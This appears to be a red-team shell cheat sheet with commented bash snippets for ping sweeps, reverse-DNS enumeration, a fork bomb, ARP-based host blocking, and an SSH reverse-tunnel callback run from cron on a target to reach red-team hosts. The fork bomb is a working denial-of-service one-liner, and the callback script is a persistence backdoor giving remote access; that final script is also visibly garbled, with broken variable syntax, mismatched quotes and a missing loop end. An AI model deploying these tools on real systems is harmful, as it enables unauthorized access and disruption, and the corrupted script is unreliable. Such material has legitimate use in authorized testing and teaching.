PING SWEEP

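# Ping sweep of a /24: one ICMP echo per host, responders appended to ips.txt.
# NET is the first three octets of the range (e.g. 192.168.1). It must be set
# explicitly so a stray paste never sweeps a range you did not intend.
# -W 1 (Linux ping) caps the wait per silent host at 1 s instead of ~10 s;
# BSD/macOS ping takes -W in milliseconds, drop it there.
# tr -d ':' strips the colon ping prints after the address
# ("64 bytes from 10.0.0.5: icmp_seq=1 ...") so ips.txt holds bare addresses.
NET=${NET:?set NET to the first three octets of the target range, e.g. 192.168.1}
for x in {1..254}; do ping -c 1 -W 1 "$NET.$x" | grep "64 b" | cut -d" " -f4 | tr -d ':' >> ips.txt; done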

AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT

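#!/bin/bash
# Reverse-resolve every address in a class C range (PTR lookups via host(1))
# and print the hostnames, one per line. Input is the first three octets.
echo "Enter Class C Range: i.e. 192.168.3"
read -r range
# Only three dotted numeric octets are accepted; anything else is refused
# before it is handed to host(1), so typos or stray characters never become
# part of a query.
if ! [[ $range =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
  echo "invalid range: $range (expected e.g. 192.168.3)" >&2
  exit 1
fi
for ip in {1..254}; do
  # host prints "W.Z.Y.X.in-addr.arpa domain name pointer NAME."; field 5 is NAME.
  host "$range.$ip" | grep "name pointer" | cut -d" " -f5
done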

FORK BOMB (CREATES PROCESSES UNTIL THE SYSTEM "CRASHES")

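# Fork bomb: defines a function named ':' that pipes itself into a backgrounded
# copy of itself, then calls it once; the process count doubles until the
# kernel's limits are hit and the host stops scheduling anything useful.
# This is a local denial-of-service primitive, not a test tool: run it only on
# a host you are authorized to take down. Mitigation: a per-user process cap
# (`ulimit -u`, or nproc in /etc/security/limits.conf) bounds the blast radius.
:(){ :|:& };: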

DNS REVERSE LOOKUP

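# Reverse-DNS every address in a /24 and append the PTR answers to dns.txt.
# NET is the first three octets (e.g. 10.0.0); it must be set explicitly.
# +noall +answer prints only the answer records. The original filtered with
# `grep $ip`, which for a one- or two-digit $ip also matched the question
# section, timestamps and unrelated addresses in dig's output.
NET=${NET:?set NET to the first three octets of the target range, e.g. 10.0.0}
for ip in {1..254}; do dig +noall +answer -x "$NET.$ip" >> dns.txt; done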

BANNING SCRIPT

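#!/bin/sh
# "Bans" hosts in 192.168.1.0/24 by pinning a bogus static ARP entry for each
# address on THIS machine: this host can no longer talk to them, but nothing
# changes for the rest of the network (it is not a firewall rule and the
# targets are not affected). .1 is assumed to be the router and .20-.22 are
# left alone; the loop stops at .253, so .254 is never touched either.
# Requires root (arp -s writes the kernel neighbour table). On current Linux
# the arp binary may be missing; `ip neigh add ADDR lladdr MAC nud permanent`
# is the equivalent. Undo an entry with `arp -d ADDR`.
NET=${NET:-192.168.1}
i=2
while [ "$i" -le 253 ]; do
	# Two separate tests instead of the deprecated, ambiguous `-a` form.
	if [ "$i" -ne 20 ] && [ "$i" -ne 21 ] && [ "$i" -ne 22 ]; then
		echo "BANNED: arp -s $NET.$i"
		arp -s "$NET.$i" 00:00:00:00:00:0a
	else
		echo "IP NOT BANNED: $NET.$i**************"
		echo "*****************************************"
	fi
	# POSIX arithmetic; the original spawned expr(1) on every iteration.
	i=$((i + 1))
done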

SSH CALLBACK

Set up the script in crontab to call back every X minutes. Strongly recommend creating a dedicated, unprivileged user on the red team computer with no login shell (e.g. /usr/sbin/nologin) that is used for nothing but this tunnel. The script uses a private key stored on the callback source computer (the target) to authenticate to the red team computer, whose authorized_keys holds the matching public key; restrict that key in authorized_keys (e.g. the `restrict` option, or `no-pty,command="..."`) so that anyone who recovers the key from the target gets nothing beyond the tunnel endpoint. The red teamer then reaches the target through the reverse tunnel with a local SSH session on the red team computer (in the example below, `ssh -p 4040 localhost`). Note that the private key sits on the target in the clear, so it should be unique to this engagement and revoked when it ends.

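#!/bin/sh
# Callback script located on the callback source computer (target).
# Meant to run from cron; each run tears down the previous reverse tunnel and
# re-establishes it to the first reachable red team host.
REMLIS=4040          # port on the red team box (loopback) that is forwarded back to this host's sshd
REMUSR=user          # restricted, shell-less account on the red team box
HOSTS="domain1.com domain2.com domain3.com"   # red team hosts to try, in order
# The previous tunnel must die so the remote port can be bound again. The
# original used `killall ssh`, which also kills every other ssh process on the
# host, including the operator's own sessions, and is very noticeable. Match
# only our own tunnel instead (pattern assumes the tunnel is started later in
# this script as `ssh -R ${REMLIS}:...`; adjust it if the invocation differs).
pkill -f "ssh -R ${REMLIS}:" >/dev/null 2>&1
sleep 5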
for LIVEHOST in SHOSTS;
do
	COUNT-S(ping -c2 $LIVEHOST | grep 'received' | awk -F',' "{ print
$2 }' | awk '{print $1 }')
	if [[ $COUNT -gt 0 ]]; then
		ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}
fi